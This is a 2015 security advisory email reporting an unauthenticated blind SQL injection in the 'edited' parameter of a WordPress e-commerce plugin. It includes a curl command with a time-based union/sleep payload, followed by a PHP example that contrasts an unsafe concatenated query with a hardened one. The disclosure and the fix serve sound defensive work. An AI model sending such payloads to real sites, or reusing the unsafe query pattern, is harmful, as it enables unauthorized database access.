Subject: Blind SQL injection in smart manager for wp e commerce 3.9.6
Date: Wed, 8 Jul 2015 18:45:02 +0200

Hello,

Plugin: smart manager for wp e commerce 3.9.6 https://wordpress.org/plugins/smart-manager-for-wp-e-commerce/

Unauthenticated remote attackers can execute arbitrary SQL commands.

1. SQL injection (woo_insert_update_data())

Method: POST
URL: http://localhost/wp-content/plugins/smart-manager-for-wp-e-commerce/sm/woo-json.php
Vulnerable parameter: edited

Example PHP call stack:

woo-json.php [/smart-manager-for-wp-e-commerce/sm/woo-json.php:3078]
woo_insert_update_data [/smart-manager-for-wp-e-commerce/sm/woo-json.php:2659]
wpdb::get_results

Verification:

curl --request POST  --data "cmd=saveData&edited=[{\"id\":\" 1) union select sleep(10),2; -- -\"}]" http://localhost/wp-content/plugins/smart-manager-for-wp-e-commerce/sm/woo-json.php
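For readers maintaining similar code, the following is an added illustration written for this page; it is not the plugin's own source. It shows the pattern the advisory describes (a value taken from the JSON-decoded `edited` POST parameter and concatenated into a query that reaches `wpdb::get_results`) beside a hardened form that checks authorization, validates the id as an integer and binds it with `$wpdb->prepare()`. The table name, the nonce action `sm_save_data` and the capability `manage_options` are placeholders chosen here, and the snippet assumes it runs inside a WordPress request so that `$wpdb`, `wp_unslash()`, `check_ajax_referer()` and `current_user_can()` exist.

```php
<?php
// Added illustration, not the plugin's code. Assumes WordPress is loaded
// (global $wpdb and the usual helper functions are available).
global $wpdb;
$table = $wpdb->prefix . 'example_items'; // placeholder table name

// Decode the JSON-encoded "edited" POST parameter, as the vulnerable endpoint does.
$edited = json_decode( wp_unslash( $_POST['edited'] ?? '[]' ), true );
if ( ! is_array( $edited ) ) {
    wp_die( 'Invalid payload', '', array( 'response' => 400 ) );
}

/**
 * UNSAFE: the decoded id is interpolated directly into the SQL string, so any
 * string placed in the JSON becomes part of the query. This is the shape of
 * the defect the advisory reports; shown only to contrast with the fix below.
 */
function unsafe_lookup( array $row ) {
    global $wpdb, $table;
    $sql = "SELECT * FROM {$table} WHERE id IN (" . $row['id'] . ")";
    return $wpdb->get_results( $sql );
}

/**
 * HARDENED: reject requests that are not from an authorized, nonce-carrying
 * caller, require the id to be a non-negative integer, and bind it through
 * $wpdb->prepare() so the value can never be parsed as SQL syntax.
 */
function safe_lookup( array $row ) {
    global $wpdb, $table;

    // Unauthenticated callers must never reach the query at all.
    check_ajax_referer( 'sm_save_data' );            // placeholder nonce action
    if ( ! current_user_can( 'manage_options' ) ) {  // placeholder capability
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }

    // Validate before use: a payload such as "1) union select ..." is not an
    // integer and is refused outright instead of being silently cast.
    $id = filter_var( $row['id'] ?? null, FILTER_VALIDATE_INT, array( 'options' => array( 'min_range' => 0 ) ) );
    if ( false === $id ) {
        wp_die( 'Invalid id', '', array( 'response' => 400 ) );
    }

    // %d binds an integer; the table name is trusted code, not user input.
    $sql = $wpdb->prepare( "SELECT * FROM {$table} WHERE id = %d", $id );
    return $wpdb->get_results( $sql );
}

foreach ( $edited as $row ) {
    $results = safe_lookup( $row );
    // ... handle $results ...
}
```

The order of checks matters: the authorization and nonce checks run before any input is touched, so the unauthenticated access path the advisory describes is closed independently of the injection fix, and the integer validation returns a 400 rather than relying on `%d` coercion, which would quietly turn the advisory's payload into `1` and hide the attempt from the application's logs.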

-- 
Regards,
Marcin Probola,